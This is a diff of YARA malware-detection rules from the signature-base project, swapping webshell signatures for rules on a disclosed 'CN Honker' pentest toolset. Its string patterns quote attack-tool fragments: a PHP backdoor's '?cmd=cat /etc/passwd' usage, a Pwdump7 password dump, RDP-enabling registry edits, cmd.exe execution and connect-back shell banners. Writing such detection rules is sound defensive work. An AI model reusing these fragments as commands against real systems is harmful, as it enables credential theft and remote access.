-		hash = "5295ee8dc2f5fd416be442548d68f7a6"
-		logic_hash = "5a2125fc447344f8cc708503d9e4dd82f9b873e40ded497ef9e01974d08bf043"
-		score = 75
+		hash = "5ff92f39ade12f8ba6cb75dfdc9bb907e49f0ebd"
+		logic_hash = "637b3368fac624ca78d2f573b8b937b6b265426d7ed923f3a3d06039663c97ad"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "rand(1,99999);$sj98"
-		$s1 = "$dump_file.='`'.$rows2[0].'`"
-		$s3 = "filename=\\\"dump_{$db_dump}_${table_d"
+		$s1 = "@del c:\\termsrvhack.dll" fullword ascii
+		$s2 = "@del c:\\3389.txt" fullword ascii
 
 	condition:
-		2 of them
+		filesize < 3KB and all of them
 }
-rule SIGNATURE_BASE_Cmdasp_Asp
+rule SIGNATURE_BASE_CN_Honker_Injection_Transit_Jmcook : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file CmdAsp.asp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "79e0ba85-ed4b-5909-a2fd-9b4125598078"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4147-L4160"
+		description = "Script from disclosed CN Honker Pentest Toolset - file jmCook.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "468abb0e-a163-5fc5-b6a1-896fc04b8570"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L116-L131"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "64f24f09ec6efaa904e2492dffc518b9"
-		logic_hash = "95dc25ecd47b43edbd7e7e36966377aa09da769aff2bc1c33a7df87989611bfa"
-		score = 75
-		quality = 85
-		tags = ""
+		hash = "5e1851c77ce922e682333a3cb83b8506e1d7395d"
+		logic_hash = "f7a9aca65b92d4b9c787d83a421b54a23844fa8e061c6c627ddde8ab5b7f4396"
+		score = 70
+		quality = 83
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "CmdAsp.asp"
-		$s1 = "Set oFileSys = Server.CreateObject(\"Scripting.FileSystemObject\")" fullword
-		$s2 = "-- Use a poor man's pipe ... a temp file --"
-		$s3 = "maceo @ dogmile.com"
+		$s1 = ".Open \"POST\",PostUrl,False" fullword ascii
+		$s2 = "JmdcwName=request(\"jmdcw\")" fullword ascii
 
 	condition:
-		2 of them
+		filesize < 9KB and all of them
 }
-rule SIGNATURE_BASE_Simple_Backdoor_Php
+rule SIGNATURE_BASE_CN_Honker_Pwdump7_Pwdump7 : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file simple-backdoor.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "5607f501-a750-59be-9595-5ac71ea6f74b"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4161-L4173"
+		description = "Script from disclosed CN Honker Pentest Toolset - file Pwdump7.bat"
+		author = "Florian Roth (Nextron Systems)"
+		id = "baf6ced6-4298-5453-a020-a384c923584c"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L133-L147"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f091d1b9274c881f8e41b2f96e6b9936"
-		logic_hash = "e2e98580b59727313de298fab0009704f621b1b6556220d5065118d960f7a068"
-		score = 75
+		hash = "67d0e215c96370dcdc681bb2638703c2eeea188a"
+		logic_hash = "50e4ec9716b4e9d824fb301bb493dcdcd9782d87c0fb8040b82a87faf56292cb"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "$cmd = ($_REQUEST['cmd']);" fullword
-		$s1 = "<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->"
-		$s2 = "Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd" fullword
+		$s1 = "Pwdump7.exe >pass.txt" fullword ascii
 
 	condition:
-		2 of them
+		filesize < 1KB and all of them
 }
-rule SIGNATURE_BASE_Mysql_Shell_Php
+rule SIGNATURE_BASE_CN_Honker_Portrecall_Pr : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file mysql_shell.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "e517984b-575c-5ead-a438-9767d2c74099"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4174-L4186"
+		description = "Script from disclosed CN Honker Pentest Toolset - file pr"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1e137ed0-3af6-5b01-a27b-87bf42359887"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L149-L165"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d42aec2891214cace99b3eb9f3e21a63"
-		logic_hash = "dbd825e1056c41efaf80c0495ba7b6cf1c88403b997ea7ac1378512a19f7ed8a"
-		score = 75
+		hash = "583cf6dc2304121d835f2879803a22fea76930f3"
+		logic_hash = "f33373e87887506651b1fac464f860a3cf18ad681ba124b606524f6f2255e693"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "SooMin Kim"
-		$s1 = "smkim@popeye.snu.ac.kr"
-		$s2 = "echo \"<td><a href='$PHP_SELF?action=deleteData&dbname=$dbname&tablename=$tablen"
+		$s1 = "Usage: Same as lcx.exe in win32 :)" fullword ascii
+		$s2 = "connect to client" fullword ascii
+		$s3 = "PR(Packet redirection) for linux " fullword ascii
 
 	condition:
-		1 of them
+		filesize < 70KB and all of them
 }
-rule SIGNATURE_BASE_Dive_Shell_1_0___Emperor_Hacking_Team_Php
+rule SIGNATURE_BASE_CN_Honker_Sig_3389_3389_3 : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file Dive Shell 1.0 - Emperor Hacking Team.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "d75294a4-a0a7-5c74-bb7a-766db477633c"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4187-L4200"
+		description = "Script from disclosed CN Honker Pentest Toolset - file 3389.bat"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ff61a5cb-6089-5632-a65d-09f4ffd99857"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L167-L183"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1b5102bdc41a7bc439eea8f0010310a5"
-		logic_hash = "bd51b625359799178ad3c8e02ba5bb5fca89e6e14769b86dd35c2b8a1049599f"
-		score = 75
+		hash = "cfedec7bd327897694f83501d76063fe16b13450"
+		logic_hash = "df07958e44c7896bc7bdf2b79bc95969593eb21b9c9ed51213fd15affb731ec2"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Emperor Hacking TEAM"
-		$s1 = "Simshell" fullword
-		$s2 = "ereg('^[[:blank:]]*cd[[:blank:]]"
-		$s3 = "<form name=\"shell\" action=\"<?php echo $_SERVER['PHP_SELF'] ?>\" method=\"POST"
+		$s1 = "echo \"fDenyTSConnections\"=dword:00000000>>3389.reg " fullword ascii
+		$s2 = "echo \"PortNumber\"=dword:00000d3d>>3389.reg " fullword ascii
+		$s3 = "echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server]>>" ascii
 
 	condition:
-		2 of them
+		filesize < 2KB and all of them
 }
-rule SIGNATURE_BASE_Asmodeus_V0_1_Pl
+rule SIGNATURE_BASE_CN_Honker_Alien_D : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file Asmodeus v0.1.pl.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "cfd082a8-56fa-54bc-a683-c0052f78e12e"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4201-L4214"
+		description = "Script from disclosed CN Honker Pentest Toolset - file D.ASP"
+		author = "Florian Roth (Nextron Systems)"
+		id = "88529577-0dea-5aa8-b763-79a69397ddd5"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L185-L203"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0978b672db0657103c79505df69cb4bb"
-		logic_hash = "be0130c9d2a5d29e6ef8749b0058c96c2ca1ecb9823fd14a8a2c82978cf3d104"
-		score = 75
+		hash = "de9cd4bd72b1384b182d58621f51815a77a5f07d"
+		logic_hash = "2eca697dd1f2ad80c5cd71507cd5f8abd2364b11dfe3206a1043e3d4f5835797"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "[url=http://www.governmentsecurity.org"
-		$s1 = "perl asmodeus.pl client 6666 127.0.0.1"
-		$s2 = "print \"Asmodeus Perl Remote Shell"
-		$s4 = "$internet_addr = inet_aton(\"$host\") or die \"ALOA:$!\\n\";" fullword
+		$s0 = "Paths_str=\"c:\\windows\\\"&chr(13)&chr(10)&\"c:\\Documents and Settings\\\"&chr" ascii
+		$s1 = "CONST_FSO=\"Script\"&\"ing.Fil\"&\"eSyst\"&\"emObject\"" fullword ascii
+		$s2 = "Response.Write \"<form id='form1' name='form1' method='post' action=''>\"" fullword ascii
+		$s3 = "set getAtt=FSO.GetFile(filepath)" fullword ascii
+		$s4 = "Response.Write \"<input name='NoCheckTemp' type='checkbox' id='NoCheckTemp' chec" ascii
 
 	condition:
-		2 of them
+		filesize < 30KB and 2 of them
 }
-rule SIGNATURE_BASE_Backup_Php_Often_With_C99Shell
+rule SIGNATURE_BASE_CN_Honker_Chinachopper_Db : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file backup.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4215-L4227"
+		description = "Script from disclosed CN Honker Pentest Toolset - file db.mdb"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1314e204-d3f5-5f0a-bb74-dc774fef3d3c"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L205-L221"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "aeee3bae226ad57baf4be8745c3f6094"
-		logic_hash = "e27d00ebfbac2565568b9a97552a331db91b4e9aa318febb048937f5c3a1a1ba"
-		score = 75
+		hash = "af79ff2689a6b7a90a5d3c0ebe709e42f2a15597"
+		logic_hash = "b650498df99c4620e3904ce8980cd58eb0cb5e0a7a275d54bdbcc41a687bec8e"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "#phpMyAdmin MySQL-Dump" fullword
-		$s2 = ";db_connect();header('Content-Type: application/octetstr"
-		$s4 = "$data .= \"#Database: $database" fullword
+		$s1 = "http://www.maicaidao.com/server.phpcaidao" fullword wide
+		$s2 = "<O>act=login</O>" fullword wide
+		$s3 = "<H>localhost</H>" fullword wide
 
 	condition:
-		all of them
+		filesize < 340KB and 2 of them
 }
-rule SIGNATURE_BASE_Reader_Asp
+rule SIGNATURE_BASE_CN_Honker_Syconfig : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file Reader.asp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "70094d24-fa3a-503c-b9b6-294a883fc52c"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4228-L4240"
+		description = "Script from disclosed CN Honker Pentest Toolset - file syconfig.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3850007d-20d5-5b10-a549-dc4655877c6e"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L223-L237"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ad1a362e0a24c4475335e3e891a01731"
-		logic_hash = "ec0dc3b050d84e852e0c18bd00961f109d3506fa7f2e8656448bd5edd28d9305"
-		score = 75
+		hash = "ff75353df77d610d3bccfbffb2c9dfa258b2fac9"
+		logic_hash = "6b7f918b83bac84df5ac6b247d4162dd385aba0a32570366c62fc4830199e86e"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Mehdi & HolyDemon"
-		$s2 = "www.infilak."
-		$s3 = "'*T@*r@#@&mms^PdbYbVuBcAAA==^#~@%><form method=post name=inf><table width=\"75%"
+		$s9 = "Hashq.CrackHost+FormUnit" fullword ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x0100 and filesize < 18KB and all of them
 }
-rule SIGNATURE_BASE_Phpshell17_Php
+rule SIGNATURE_BASE_CN_Honker_Linux_Bin : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file phpshell17.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "ea1f657c-2023-50bb-a2ee-33c53ee8fb5e"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4241-L4253"
+		description = "Script from disclosed CN Honker Pentest Toolset - file linux_bin"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3c56a4a8-6392-517c-a16e-63785799acb9"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L239-L254"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "9a928d741d12ea08a624ee9ed5a8c39d"
-		logic_hash = "a9306747a5c9756f393c61562ed4a601c75c3a9491ad19a7b7dbae1fbd505e9a"
-		score = 75
+		hash = "26e71e6ebc6a3bdda9467ce929610c94de8a7ca0"
+		logic_hash = "d02fcf23e46a0b6d44c382e34d73ef6239b6a1afc690e417aa0e6b0898e277c0"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p>" fullword
-		$s1 = "<title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]<?php echo PHPSHELL_VERSION ?></"
-		$s2 = "href=\"mailto: [YOU CAN ENTER YOUR MAIL HERE]- [ADDITIONAL TEXT]</a></i>" fullword
+		$s1 = "client.sin_port = htons(atoi(argv[3]));" fullword ascii
+		$s2 = "printf(\"\\n\\n*********Waiting Client connect*****\\n\\n\");" fullword ascii
 
 	condition:
-		1 of them
+		filesize < 20KB and all of them
 }
-rule SIGNATURE_BASE_Myshell_Php_Php
+rule SIGNATURE_BASE_CN_Honker_Intersect2_Beta : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file myshell.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "eaf243cb-fa26-5f34-a724-60a08acff636"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4254-L4266"
+		description = "Script from disclosed CN Honker Pentest Toolset - file Intersect2-Beta.py"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d20da18d-f8c9-5eb3-8d5d-c8816cff3200"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L256-L272"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "62783d1db52d05b1b6ae2403a7044490"
-		logic_hash = "dd7b0fa637a8317986de0c2312b4b552f1110fb5a64590a9a21c854e5985fbb6"
-		score = 75
+		hash = "3ba5f720c4994cd4ad519b457e232365e66f37cc"
+		logic_hash = "bc6a83f8f851f7fb5b620be889619fcbd9f34ba27d495c2040e207caf95854bb"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "@chdir($work_dir) or ($shellOutput = \"MyShell: can't change directory."
-		$s1 = "echo \"<font color=$linkColor><b>MyShell file editor</font> File:<font color"
-		$s2 = " $fileEditInfo = \"&nbsp;&nbsp;:::::::&nbsp;&nbsp;Owner: <font color=$"
+		$s1 = "os.system(\"ls -alhR /home > AllUsers.txt\")" fullword ascii
+		$s2 = "os.system('getent passwd > passwd.txt')" fullword ascii
+		$s3 = "os.system(\"rm -rf credentials/\")" fullword ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x2123 and filesize < 50KB and 2 of them
 }
-rule SIGNATURE_BASE_Simshell_1_0___Simorgh_Security_MGZ_Php
+rule SIGNATURE_BASE_CN_Honker_IIS_Logcleaner1_0_Readme : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file SimShell 1.0 - Simorgh Security MGZ.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "51565555-a17b-59c7-b433-c3166fe0d7f0"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4267-L4280"
+		description = "Script from disclosed CN Honker Pentest Toolset - file readme.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6f3605ab-cf9d-5f6b-8d89-6269976c5b0b"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L274-L289"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "37cb1db26b1b0161a4bf678a6b4565bd"
-		logic_hash = "590a1572877fafcd4425a04c12cd56194f03a63b7acad93c39d4b16dc5a1902d"
-		score = 75
+		hash = "2ab47d876b49e9a693f602f3545381415e82a556"
+		logic_hash = "3cbd7b2e1710c78bc8ab8d2730cc6da8eb95038f8431d5d0081db984b3d706cf"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Simorgh Security Magazine "
-		$s1 = "Simshell.css"
-		$s2 = "} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], "
-		$s3 = "www.simorgh-ev.com"
+		$s2 = "LogCleaner.exe <ip> [Logpath]" fullword ascii
+		$s3 = "http://l-y.vicp.net" fullword ascii
 
 	condition:
-		2 of them
+		filesize < 7KB and all of them
 }
-rule SIGNATURE_BASE_Jspshall_Jsp
+rule SIGNATURE_BASE_CN_Honker_Alien_Command : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file jspshall.jsp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "4bccad33-d26e-52c2-b7f8-802f2c8f3889"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4281-L4293"
+		description = "Script from disclosed CN Honker Pentest Toolset - file command.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "55dd10c9-f7dc-5ee2-a47d-dab8cc7b60e6"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L291-L306"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "efe0f6edaa512c4e1fdca4eeda77b7ee"
-		logic_hash = "94c458d3f38ba21348b0202e2b81bbbc3859e97d64f101a9ea7ec6f036e38bc5"
-		score = 75
+		hash = "5896b74158ef153d426fba76c2324cd9c261c709"
+		logic_hash = "a55be30fdb6598669d144308af5a9b6a21ab6140c75fdfc18cecf5d9add4a530"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "kj021320"
-		$s1 = "case 'T':systemTools(out);break;"
-		$s2 = "out.println(\"<tr><td>\"+ico(50)+f[i].getName()+\"</td><td> file"
+		$s0 = "for /d %i in (E:\\freehost\\*) do @echo %i" fullword ascii
+		$s1 = "/c \"C:\\windows\\temp\\cscript\" C:\\windows\\temp\\iis.vbs" fullword ascii
 
 	condition:
-		2 of them
+		filesize < 8KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Php
+rule SIGNATURE_BASE_CN_Honker_Portrecall_Bc : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file webshell.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4294-L4305"
+		description = "Script from disclosed CN Honker Pentest Toolset - file bc.pl"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ea74f260-87e6-5027-b558-628949cae32a"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L308-L324"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e425241b928e992bde43dd65180a4894"
-		logic_hash = "7b0f4f4afde7dcb44c9d877a72c961f3666278ce28a24ae8068cfbc32639e307"
-		score = 75
+		hash = "2084990406398afd856b2309c7f579d7d61c3767"
+		logic_hash = "f51644f195e42b91dae80ba1770aeb40790ea8528b6d09f5fed0f71d93bda5fc"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "<die(\"Couldn't Read directory, Blocked!!!\");"
-		$s3 = "PHP Web Shell"
+		$s0 = "print \"[*] Connected to remote host \\n\"; " fullword ascii
+		$s1 = "print \"Usage: $0 [Host] [Port] \\n\\n\";  " fullword ascii
+		$s5 = "print \"[*] Resolving HostName\\n\"; " fullword ascii
 
 	condition:
-		all of them
+		filesize < 10KB and all of them
 }
-rule SIGNATURE_BASE_Rootshell_Php
+rule SIGNATURE_BASE_CN_Honker_Tuoku_Script_MSSQL_ : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file rootshell.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "aec6621e-f23a-5f9f-91f1-d2f1b1ab58d0"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4306-L4319"
+		description = "Script from disclosed CN Honker Pentest Toolset - file MSSQL_.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "35c4f119-6a57-580a-b5ee-c36af0ccc94a"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L326-L342"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "265f3319075536030e59ba2f9ef3eac6"
-		logic_hash = "f836dd1825dc84212d32a034c0dde45d60ccd1eb667018abb60d671b61192666"
-		score = 75
+		hash = "7097c21f92306983add3b5b29a517204cd6cd819"
+		logic_hash = "4d721fd9711799cf3fd8ba6c300e270ed25faa2fb938ea01464e9bc9a3768e22"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "shells.dl.am"
-		$s1 = "This server has been infected by $owner"
-		$s2 = "<input type=\"submit\" value=\"Include!\" name=\"inc\"></p>"
-		$s4 = "Could not write to file! (Maybe you didn't enter any text?)"
+		$s1 = "GetLoginCookie = Request.Cookies(Cookie_Login)" fullword ascii
+		$s2 = "if ShellPath=\"\" Then ShellPath = \"c:\\\\windows\\\\system32\\\\cmd.exe\"" fullword ascii
+		$s8 = "Set DD=CM.exec(ShellPath&\" /c \"&DefCmd)" fullword ascii
 
 	condition:
-		2 of them
+		filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE_Connectback2_Pl
+rule SIGNATURE_BASE_CN_Honker_Nc_MOVE : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file connectback2.pl.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "4ddebc62-17d2-577e-84bd-207367078327"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4320-L4332"
+		description = "Script from disclosed CN Honker Pentest Toolset - file MOVE.txt"
